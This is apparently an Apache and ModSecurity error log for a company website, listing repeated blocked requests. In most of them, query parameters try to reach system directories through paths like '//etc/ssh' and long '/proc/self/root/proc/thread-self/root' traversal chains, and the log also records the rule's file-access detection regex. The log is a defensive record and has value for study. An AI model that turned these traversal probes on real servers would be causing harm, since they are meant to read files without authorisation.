[Wed Mar 18 04:08:39.083622 2026] [:error] [pid 17887:tid 140411674785536] [client 216.73.216.191:54048] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPdwkwaGbbGflqUZDUPwAAAMg"]
[Wed Mar 18 04:08:39.370422 2026] [:error] [pid 11816:tid 140411565680384] [client 216.73.216.191:54068] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPd-w_le52K8_3pV2hjgAAAhU"]
[Wed Mar 18 04:08:39.585692 2026] [:error] [pid 15826:tid 140411708356352] [client 216.73.216.191:54026] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPd-oXxyEfFpUF8f8vAwAAAUQ"]
[Wed Mar 18 04:08:41.107082 2026] [:error] [pid 19507:tid 140411699963648] [client 216.73.216.191:54180] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPedY0UrI5A3LftIxUMgAAAYU"]
[Wed Mar 18 04:08:41.335198 2026] [:error] [pid 30077:tid 140411574073088] [client 216.73.216.191:54194] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPefu8EFLIOrSqIpvH7gAAAlQ"]
[Wed Mar 18 04:08:47.808027 2026] [:error] [pid 29882:tid 140411741927168] [client 74.7.241.31:36092] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPf0zinOy1jxa1j4fUWQAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:09:20.087682 2026] [:error] [pid 26799:tid 140411691570944] [client 216.73.216.191:54924] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ethertypes"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPoNa6ubjKNq_cu4ZYAgAAA0Y"]
[Wed Mar 18 04:09:21.181638 2026] [:error] [pid 17887:tid 140411624429312] [client 216.73.216.191:54988] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPoQkwaGbbGflqUZDUUQAAAM4"]
[Wed Mar 18 04:09:21.419073 2026] [:error] [pid 17887:tid 140411557287680] [client 216.73.216.191:55000] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pkcs11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPoQkwaGbbGflqUZDUUgAAANY"]
[Wed Mar 18 04:09:59.864215 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:37312] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPx-yqAr6etmhZHNp6_AAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:10:22.845107 2026] [:error] [pid 11816:tid 140411674785536] [client 216.73.216.191:35074] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpP3uw_le52K8_3pV2hvwAAAgg"]
[Wed Mar 18 04:10:23.107007 2026] [:error] [pid 17887:tid 140411741927168] [client 216.73.216.191:37613] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/redhat-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpP3wkwaGbbGflqUZDUgQAAAMA"]
[Wed Mar 18 04:11:15.529567 2026] [:error] [pid 29882:tid 140411733534464] [client 74.7.241.31:32992] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQE0zinOy1jxa1j4fUrwAAAQE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:11:23.387197 2026] [:error] [pid 11816:tid 140411708356352] [client 216.73.216.191:57980] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQG-w_le52K8_3pV2h6gAAAgQ"]
[Wed Mar 18 04:11:23.490235 2026] [:error] [pid 31803:tid 140411582465792] [client 216.73.216.191:57994] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQG-yqAr6etmhZHNp7HQAAAFM"]
[Wed Mar 18 04:11:31.435282 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.241.31:58250] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQIwkwaGbbGflqUZDUugAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 04:11:32.761421 2026] [:error] [pid 19507:tid 140411607643904] [client 216.73.216.191:58400] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQJNY0UrI5A3LftIxUmAAAAZA"]
[Wed Mar 18 04:11:33.159474 2026] [:error] [pid 30077:tid 140411683178240] [client 216.73.216.191:58426] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQJfu8EFLIOrSqIpvIdAAAAkc"]
[Wed Mar 18 04:11:52.814700 2026] [:error] [pid 26799:tid 140411632822016] [client 216.73.216.191:59044] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQONa6ubjKNq_cu4ZYYQAAA00"]
[Wed Mar 18 04:11:55.255792 2026] [:error] [pid 11816:tid 140411666392832] [client 216.73.216.191:59106] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQOuw_le52K8_3pV2iBwAAAgk"]
[Wed Mar 18 04:11:55.259908 2026] [:error] [pid 17887:tid 140411557287680] [client 216.73.216.191:59110] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dbus-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQOgkwaGbbGflqUZDU1wAAANY"]
[Wed Mar 18 04:11:55.261371 2026] [:error] [pid 29882:tid 140411666392832] [client 216.73.216.191:59124] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sasl2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQOkzinOy1jxa1j4fUyAAAAQk"]
[Wed Mar 18 04:11:58.343133 2026] [:error] [pid 30077:tid 140411557287680] [client 216.73.216.191:59296] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQPvu8EFLIOrSqIpvIkQAAAlY"]
[Wed Mar 18 04:11:58.443472 2026] [:error] [pid 30077:tid 140411548894976] [client 216.73.216.191:59302] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQPvu8EFLIOrSqIpvIkgAAAlc"]
[Wed Mar 18 04:12:05.298287 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.244.43:60328] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpQRew_le52K8_3pV2iCgAAAhQ"]
[Wed Mar 18 04:12:06.820078 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.228.61:37378] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpQRtY0UrI5A3LftIxUyAAAAYA"]
[Wed Mar 18 04:12:28.724269 2026] [:error] [pid 30077:tid 140411708356352] [client 216.73.216.191:59986] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQXPu8EFLIOrSqIpvIpwAAAkQ"]
[Wed Mar 18 04:12:49.779517 2026] [:error] [pid 19507:tid 140411582465792] [client 216.73.216.191:60316] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQcdY0UrI5A3LftIxVDwAAAZM"]
[Wed Mar 18 04:12:53.923227 2026] [mime_magic:error] [pid 19507:tid 140411616036608] (70014)End of file found: [client 74.7.241.31:49944] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/lib/firmware/amdgpu
[Wed Mar 18 04:13:09.832301 2026] [:error] [pid 17653:tid 140411574073088] [client 216.73.216.191:60926] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQhcdf6f5d65gmYZSTPAAAAtQ"]
